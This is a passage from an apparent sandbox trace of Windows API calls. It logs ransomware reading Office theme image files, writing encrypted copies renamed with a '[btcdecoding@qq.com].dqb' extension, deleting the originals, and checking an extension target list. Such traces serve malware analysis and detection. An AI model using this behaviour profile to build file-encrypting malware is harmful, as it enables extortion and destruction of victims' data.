lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.369] WriteFile (in: hFile=0x200, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.369] SetEndOfFile (hFile=0x200) returned 1 [0044.370] CloseHandle (hObject=0x200) returned 1 [0044.370] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.370] SetEndOfFile (hFile=0x174) returned 1 [0044.370] CloseHandle (hObject=0x174) returned 1 [0044.371] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.371] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 1 [0044.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.371] lstrlenW (lpString=".doc") returned 4 [0044.371] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.371] lstrlenW (lpString=".docx") returned 5 [0044.371] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.371] lstrlenW (lpString=".pdf") returned 4 [0044.371] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.371] lstrlenW (lpString=".xls") returned 4 [0044.371] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.371] lstrlenW (lpString=".xlsx") returned 5 [0044.371] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.371] lstrlenW (lpString=".ppt") returned 4 [0044.371] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.371] lstrlenW (lpString=".zip") returned 4 [0044.371] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.371] lstrlenW (lpString=".rar") returned 4 [0044.371] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.371] lstrlenW (lpString=".bz2") returned 4 [0044.372] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.372] lstrlenW (lpString=".7z") returned 3 [0044.372] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.372] lstrlenW (lpString=".dbf") returned 4 [0044.372] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.372] lstrlenW (lpString=".1cd") returned 4 [0044.372] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.372] lstrlenW (lpString=".jpg") returned 4 [0044.372] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.372] lstrlenW (lpString=".doc") returned 4 [0044.372] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.372] lstrlenW (lpString=".docx") returned 5 [0044.372] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.372] lstrlenW (lpString=".pdf") returned 4 [0044.372] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.372] lstrlenW (lpString=".xls") returned 4 [0044.372] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.372] lstrlenW (lpString=".xlsx") returned 5 [0044.372] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.372] lstrlenW (lpString=".ppt") returned 4 [0044.372] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.372] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.372] lstrlenW (lpString=".zip") returned 4 [0044.372] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.372] lstrlenW (lpString=".rar") returned 4 [0044.372] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.372] lstrlenW (lpString=".bz2") returned 4 [0044.372] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.372] lstrlenW (lpString=".7z") returned 3 [0044.372] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.373] lstrlenW (lpString=".dbf") returned 4 [0044.373] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.373] lstrlenW (lpString=".1cd") returned 4 [0044.373] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0044.373] lstrlenW (lpString=".jpg") returned 4 [0044.373] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.373] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.373] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.373] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2574) returned 1 [0044.373] CloseHandle (hObject=0x174) returned 1 [0044.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 0x20 [0044.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.374] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.374] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.374] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.374] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.378] GetLastError () returned 0x0 [0044.378] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xa0e, lpOverlapped=0x0) returned 1 [0044.380] WriteFile (in: hFile=0x200, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xa10, lpOverlapped=0x0) returned 1 [0044.380] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.380] WriteFile (in: hFile=0x200, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.381] SetEndOfFile (hFile=0x200) returned 1 [0044.381] CloseHandle (hObject=0x200) returned 1 [0044.381] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.381] SetEndOfFile (hFile=0x174) returned 1 [0044.382] CloseHandle (hObject=0x174) returned 1 [0044.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.382] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 1 [0044.382] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.382] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.382] lstrlenW (lpString=".doc") returned 4 [0044.382] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.382] lstrlenW (lpString=".docx") returned 5 [0044.382] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.382] lstrlenW (lpString=".pdf") returned 4 [0044.382] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.382] lstrlenW (lpString=".xls") returned 4 [0044.382] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.382] lstrlenW (lpString=".xlsx") returned 5 [0044.382] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.382] lstrlenW (lpString=".ppt") returned 4 [0044.382] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.382] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.382] lstrlenW (lpString=".zip") returned 4 [0044.382] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.382] lstrlenW (lpString=".rar") returned 4 [0044.383] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.383] lstrlenW (lpString=".bz2") returned 4 [0044.383] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.383] lstrlenW (lpString=".7z") returned 3 [0044.383] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.383] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.383] lstrlenW (lpString=".dbf") returned 4 [0044.383] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.383] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.383] lstrlenW (lpString=".1cd") returned 4 [0044.383] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.383] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.383] lstrlenW (lpString=".jpg") returned 4 [0044.383] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.383] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.383] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.383] lstrlenW (lpString=".doc") returned 4 [0044.383] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.383] lstrlenW (lpString=".docx") returned 5 [0044.383] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.383] lstrlenW (lpString=".pdf") returned 4 [0044.383] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.383] lstrlenW (lpString=".xls") returned 4 [0044.383] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.383] lstrlenW (lpString=".xlsx") returned 5 [0044.383] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.383] lstrlenW (lpString=".ppt") returned 4 [0044.383] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.383] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.383] lstrlenW (lpString=".zip") returned 4 [0044.383] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.383] lstrlenW (lpString=".rar") returned 4 [0044.383] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.383] lstrlenW (lpString=".bz2") returned 4 [0044.383] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.384] lstrlenW (lpString=".7z") returned 3 [0044.384] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.384] lstrlenW (lpString=".dbf") returned 4 [0044.384] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.384] lstrlenW (lpString=".1cd") returned 4 [0044.384] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.384] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0044.384] lstrlenW (lpString=".jpg") returned 4 [0044.384] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.384] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.384] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.384] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.384] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=37440) returned 1 [0044.384] CloseHandle (hObject=0x174) returned 1 [0044.384] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 0x20 [0044.384] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.385] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.385] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.385] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.385] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.385] GetLastError () returned 0x0 [0044.385] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x9240, lpOverlapped=0x0) returned 1 [0044.387] WriteFile (in: hFile=0x200, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x9250, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x9250, lpOverlapped=0x0) returned 1 [0044.388] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.388] WriteFile (in: hFile=0x200, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.389] SetEndOfFile (hFile=0x200) returned 1 [0044.389] CloseHandle (hObject=0x200) returned 1 [0044.389] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.389] SetEndOfFile (hFile=0x174) returned 1 [0044.390] CloseHandle (hObject=0x174) returned 1 [0044.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.390] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 1 [0044.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.390] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.390] lstrlenW (lpString=".doc") returned 4 [0044.390] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.391] lstrlenW (lpString=".docx") returned 5 [0044.391] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.391] lstrlenW (lpString=".pdf") returned 4 [0044.391] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.391] lstrlenW (lpString=".xls") returned 4 [0044.391] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.391] lstrlenW (lpString=".xlsx") returned 5 [0044.391] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.391] lstrlenW (lpString=".ppt") returned 4 [0044.391] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.391] lstrlenW (lpString=".zip") returned 4 [0044.391] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.391] lstrlenW (lpString=".rar") returned 4 [0044.391] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.391] lstrlenW (lpString=".bz2") returned 4 [0044.391] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.391] lstrlenW (lpString=".7z") returned 3 [0044.391] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.391] lstrlenW (lpString=".dbf") returned 4 [0044.391] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.391] lstrlenW (lpString=".1cd") returned 4 [0044.391] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.391] lstrlenW (lpString=".jpg") returned 4 [0044.391] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.391] lstrlenW (lpString=".doc") returned 4 [0044.391] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.391] lstrlenW (lpString=".docx") returned 5 [0044.391] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.391] lstrlenW (lpString=".pdf") returned 4 [0044.391] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.392] lstrlenW (lpString=".xls") returned 4 [0044.392] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.392] lstrlenW (lpString=".xlsx") returned 5 [0044.392] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.392] lstrlenW (lpString=".ppt") returned 4 [0044.392] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.392] lstrlenW (lpString=".zip") returned 4 [0044.392] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.392] lstrlenW (lpString=".rar") returned 4 [0044.392] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.392] lstrlenW (lpString=".bz2") returned 4 [0044.392] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.392] lstrlenW (lpString=".7z") returned 3 [0044.392] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.392] lstrlenW (lpString=".dbf") returned 4 [0044.392] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.392] lstrlenW (lpString=".1cd") returned 4 [0044.392] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0044.392] lstrlenW (lpString=".jpg") returned 4 [0044.392] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.392] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.392] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.392] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.393] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1593) returned 1 [0044.393] CloseHandle (hObject=0x174) returned 1 [0044.393] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 0x20 [0044.393] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.393] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.393] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.393] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.393] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.395] GetLastError () returned 0x0 [0044.395] ReadFile (in: hFile=0x174, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x639, lpOverlapped=0x0) returned 1 [0044.396] WriteFile (in: hFile=0x200, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x640, lpOverlapped=0x0) returned 1 [0044.397] ReadFile (in: hFile=0x174, 